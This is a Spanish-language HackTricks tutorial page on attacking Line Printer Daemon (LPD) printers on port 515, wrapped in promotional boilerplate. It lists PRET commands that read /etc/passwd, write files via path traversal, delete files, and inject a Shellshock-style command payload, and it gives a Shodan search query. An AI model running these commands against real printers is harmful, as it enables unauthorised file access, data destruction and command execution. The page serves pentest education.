mirror of
https://github.com/carlospolop/hacktricks
synced 2024-12-11 22:03:10 +00:00
47 lines
3.7 KiB
Markdown
47 lines
3.7 KiB
Markdown
<details>
|
|
|
|
<summary><strong>Aprende hacking en AWS de cero a héroe con</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
|
|
|
Otras formas de apoyar a HackTricks:
|
|
|
|
* Si quieres ver tu **empresa anunciada en HackTricks** o **descargar HackTricks en PDF**, consulta los [**PLANES DE SUSCRIPCIÓN**](https://github.com/sponsors/carlospolop)!
|
|
* Consigue el [**merchandising oficial de PEASS & HackTricks**](https://peass.creator-spring.com)
|
|
* Descubre [**La Familia PEASS**](https://opensea.io/collection/the-peass-family), nuestra colección de [**NFTs**](https://opensea.io/collection/the-peass-family) exclusivos
|
|
* **Únete al** 💬 [**grupo de Discord**](https://discord.gg/hRep4RUj7f) o al [**grupo de telegram**](https://t.me/peass) o **sígueme** en **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
|
|
* **Comparte tus trucos de hacking enviando PRs a los repositorios de github de** [**HackTricks**](https://github.com/carlospolop/hacktricks) y [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud).
|
|
|
|
</details>
|
|
|
|
|
|
El protocolo Line Printer Daemon (LPD) fue originalmente introducido en Berkeley Unix en los años 80 (más tarde especificado por el RFC1179).\
|
|
El daemon se ejecuta en el puerto 515/tcp y se puede acceder a él utilizando el comando `lpr`. Para imprimir, el cliente envía un **archivo de control** definiendo el trabajo/usuario y un **archivo de datos** que contiene los datos reales a imprimir. El **tipo de entrada** del archivo de datos se puede establecer en el archivo de control eligiendo entre **varios formatos de archivo**. Sin embargo, depende de la implementación de LPD cómo manejar realmente los datos de impresión. Una implementación popular de LPD para sistemas operativos similares a Unix es LPRng. LPD puede ser utilizado como un medio para desplegar **trabajos de impresión maliciosos en PostScript** o **PJL**.
|
|
|
|
Las herramientas `lpdprint` y `lpdtest` están incluidas en [**PRET**](https://github.com/RUB-NDS/PRET)**.** Son una forma minimalista de imprimir datos directamente a una impresora compatible con LPD o descargar/subir/eliminar archivos y más:
|
|
```
|
|
lpdprint.py hostname filename
|
|
lpdtest.py hostname get /etc/passwd
|
|
lpdtest.py hostname put ../../etc/passwd
|
|
lpdtest.py hostname rm /some/file/on/printer
|
|
lpdtest.py hostname in '() {:;}; ping -c1 1.2.3.4'
|
|
lpdtest.py hostname mail lpdtest@mailhost.local
|
|
```
|
|
Si quieres aprender más sobre [**hackear impresoras lee esta página**](pentesting-printers/).
|
|
|
|
# Shodan
|
|
|
|
* `puerto 515`
|
|
|
|
|
|
<details>
|
|
|
|
<summary><strong>Aprende hacking en AWS de cero a héroe con</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
|
|
|
Otras formas de apoyar a HackTricks:
|
|
|
|
* Si quieres ver tu **empresa anunciada en HackTricks** o **descargar HackTricks en PDF** revisa los [**PLANES DE SUSCRIPCIÓN**](https://github.com/sponsors/carlospolop)!
|
|
* Consigue el [**merchandising oficial de PEASS & HackTricks**](https://peass.creator-spring.com)
|
|
* Descubre [**La Familia PEASS**](https://opensea.io/collection/the-peass-family), nuestra colección de [**NFTs**](https://opensea.io/collection/the-peass-family) exclusivos
|
|
* **Únete al** 💬 [**grupo de Discord**](https://discord.gg/hRep4RUj7f) o al [**grupo de telegram**](https://t.me/peass) o **sígueme** en **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
|
|
* **Comparte tus trucos de hacking enviando PRs a los repositorios de github** [**HackTricks**](https://github.com/carlospolop/hacktricks) y [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud).
|
|
|
|
</details>
|